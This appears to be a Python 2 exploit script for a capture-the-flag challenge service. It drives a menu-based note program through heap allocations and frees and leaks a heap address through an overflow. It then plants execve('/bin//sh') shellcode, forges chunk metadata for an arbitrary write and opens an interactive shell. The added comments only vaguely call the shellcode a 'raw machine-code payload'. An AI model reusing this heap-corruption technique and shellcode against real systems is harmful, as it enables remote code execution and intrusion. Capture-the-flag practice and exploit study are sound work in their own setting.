# Python 2 script (print statements without parentheses) that drives a
# menu-based network service. `phun` is a project-local I/O helper that
# supplies Remote, sendlineafter/sendafter/readline, p64/u64 and shell();
# its API is not visible in this file, so the descriptions below of those
# calls are inferred from their names and usage.
import phun


class P(phun.Remote):
    """Session wrapper around the service's numbered text menu.

    Keeps a local model of which of 32 record slots are believed to be in
    use so that show() knows how many response lines to read back.
    """

    def __init__(self,*a,**k):
        # Slot bookkeeping: `chunks` maps slot index -> True when the slot
        # is believed occupied; `last_free` is the slot the next add() is
        # assumed to land in.
        self.last_free = 0
        self.chunks = dict(( (i,False) for i in range(32)))
        super(P,self).__init__(*a,**k)
        # Fixed login exchange. Prompt text and credentials are specific
        # to this challenge service.
        self.sendlineafter("Enter username: ","mcfly")
        self.sendlineafter(": ","awesnap")

    def get_max(self):
        """Return the index of the first slot not marked in use, or -1.

        Despite the name this is a "lowest free slot" lookup, not a
        maximum. It relies on the dict yielding its int keys in ascending
        order, which the language does not guarantee -- confirm before
        relying on it. The `print i` is leftover debug output.
        """
        for i in self.chunks:
            if not self.chunks[i]:
                print i
                return i
        return -1

    def cmd(self,nr):
        """Wait for the menu prompt ('| ') and send option number `nr`."""
        self.sendlineafter('| ',str(nr))

    def add(self,val):
        """Menu option 1: create a record whose contents are `val`.

        `val` is sent with sendafter (no newline appended), so the caller
        supplies any terminator. The local model assumes the service put
        the new record into slot `last_free`.
        """
        self.cmd(1)
        self.sendafter('> ',val)
        # NOTE(review): if get_max() previously returned -1 (no free slot
        # left), this creates a key -1 instead of marking a real slot.
        self.chunks[self.last_free] = True
        self.last_free = self.get_max()

    def free(self,n):
        """Menu option 3: delete record `n` and mark its slot free."""
        self.cmd(3)
        self.sendlineafter(': ',str(n))
        self.chunks[n] = False
        # The next add() is assumed to reuse the slot just released.
        self.last_free = n

    def modify(self,n,val):
        """Menu option 4: overwrite record `n` with `val` (sent raw, no
        newline appended)."""
        self.cmd(4)
        self.sendlineafter(': ',str(n))
        self.sendafter(': ',val)

    def show(self):
        """Menu option 2: list records.

        Returns one raw readline() result per slot this client believes
        is in use; the count comes from the local model, not from the
        service's reply.
        """
        self.cmd(2)
        r = []
        for i in self.chunks:
            if self.chunks[i]:
                r.append(self.readline())
        return r


# --- Driver script for one specific challenge instance (hostname and
# port hard-coded; the localhost alternative is left commented out). ---
r = P('beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me', 6969)
#r = P('localhost',1234)
# Populate slots 0-5 (each value carries its own '\n'), then release
# slots 3 and 1.
r.add('aasdf\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.free(3)
r.free(1)
# Overwrite record 0 with 64 bytes of 'A' (0x30 + 16), then read the
# listing back. The first returned line, minus its 3-byte prefix and any
# surrounding 'A' padding, is treated as a leaked little-endian value.
r.modify(0,'A'*(0x30 + 16 ))
x=r.show()[0][3:].strip('A')
# NOTE(review): this sanity check only prints; the script carries on and
# uses the value even when the expected low byte (0xe0) is not present.
if x[0] != "\xe0": print '[-] nope...'
# x[:-1] drops the last character (presumably the line terminator from
# readline()); subtracting the expected low byte 0xe0 yields the base
# that the remaining constants are offset from.
heap = phun.u64(x[:-1]) - 0xe0
print hex(heap)
# `p` is a raw machine-code payload written as an escaped byte string
# (a 5-byte prefix, a 0x20-byte run of 0x90, then further bytes); it is
# not decoded or verified here. It is written into record 0.
p="\xe9\x1b\x00\x00\x00" + "\x90"*0x20
p+="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
r.modify(0,p)
# Record 4 is overwritten with a fixed layout built from the leaked base
# plus challenge-specific constants (0x609958, 0x12+8, 0x30, 2); none of
# these can be derived from this file and they are not validated here.
r.modify(4,'A'*0x30 + phun.p64(0,0x12+8,0x609958-0x18,heap+0x30,2) + "\x00\x00" + phun.p64(2)+"\n")
# Release slot 5, then hand the connection over to the user via the
# helper's shell() (behaviour of shell() assumed from its name).
r.free(5)
r.shell()